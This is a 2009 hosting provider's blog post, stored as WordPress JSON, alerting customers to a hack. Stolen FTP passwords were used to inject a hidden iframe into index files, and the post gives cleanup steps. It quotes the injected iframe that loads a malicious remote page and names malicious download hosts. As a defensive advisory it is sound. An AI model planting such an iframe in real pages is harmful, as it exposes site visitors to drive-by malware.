{"id":34,"date":"2009-07-15T22:28:28","date_gmt":"2009-07-15T22:28:28","guid":{"rendered":""},"modified":"2012-06-08T12:42:26","modified_gmt":"2012-06-08T04:42:26","slug":"cyberiahosting-users-alert-malicious-iframe-hack","status":"publish","type":"post","link":"https:\/\/matnet.my\/blog\/2009\/07\/cyberiahosting-users-alert-malicious-iframe-hack\/","title":{"rendered":"Cyberiahosting Users &#8211; ALERT &#8211; Malicious IFrame hack"},"content":{"rendered":"<p>Last 2 weeks i got 2 issue regarding this matters.<\/p>\n<p>[b]The scenario:[\/b]<\/p>\n<p>All index* was edited and redirect to malicious web using iframe.<\/p>\n<p>Example:<\/p>\n<p>[quote]iframe src=&#8221;http:\/\/u9k.ru:8080\/index.php&#8221; width=151 height=125 style=&#8221;visibility: hidden&#8221;><\/iframe[\/quote]\n\n\n[b]After investigation:[\/b]\n\n1. File owner is current users not nobody or others.\n2. Files uploaded by the users with right access authentication.\n3. All index* was edited in the users www\n4. Only current users infected.\n\n\n[b]How:[\/b]\n\nThe FTP passwd was hacked.\n\nThere are 2 reason how the passwd was hacked.\n\n1. Adobe Acrobat Vulnerability\n\n[quote]\nI checked the PDF file with another online service called Wepawet and it identified the malicious code and the exploited vulnerability. Here is the report.  This virus makes use of a known vulnerability of Adobe Acrobat (Reader) CVE-2008-2992: \u00e2\u20ac\u0153Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument\u00e2\u20ac\u0153.\n\nIf you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.\n\nThis PDF file silently downloads a malicious binary (Windows executable) file from litehitscar .cn, which resides on the same server with hyperliteautoservices .cn (IP 94 .247 .3 .151). \n\nquote from - http:\/\/blog.unmaskparasites.com\/2009\/04\/15\/malicious-income-iframes-from-cn-domains\/ \n[\/quote]\n\n2. FileZilla Vulnerability.\n\n\n[b]\nHow to clean up :[\/b]\n\n1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.\n2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)\n3. Now keep the new passwords secure. Don\u00e2\u20ac\u2122t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use [url=http:\/\/en.wikipedia.org\/wiki\/SFTP]SFTP[\/url] instead of FTP if possible.\n4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.\n5. Scan your server directories for any new\/suspicious files (don\u00e2\u20ac\u2122t forget to check hidden files). Remove anything that should not be there.\n6. If your site was flagged by Google, request a malware review via [url=http:\/\/www.google.com\/webmasters\/tools\/]Webmaster Tools[\/url].\n7. Regularly check your site with diagnostics tools of your choice (my [url=http:\/\/www.unmaskparasites.com\/]Unmask Parasites[\/url] can be one of them) to be sure your site is clean.\n8. Regularly update third party software in your PC.\n\n\n\n<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Last 2 weeks i got 2 issue regarding this matters. [b]The scenario:[\/b] All index* was edited and redirect to malicious &hellip; <a href=\"https:\/\/matnet.my\/blog\/2009\/07\/cyberiahosting-users-alert-malicious-iframe-hack\/\" class=\"more-link\">More <span class=\"screen-reader-text\">Cyberiahosting Users &#8211; ALERT &#8211; Malicious IFrame hack<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-34","post","type-post","status-publish","format-standard","hentry","category-www","standard"],"_links":{"self":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts\/34","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/comments?post=34"}],"version-history":[{"count":2,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts\/34\/revisions"}],"predecessor-version":[{"id":64,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/posts\/34\/revisions\/64"}],"wp:attachment":[{"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/media?parent=34"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/categories?post=34"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/matnet.my\/blog\/wp-json\/wp\/v2\/tags?post=34"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}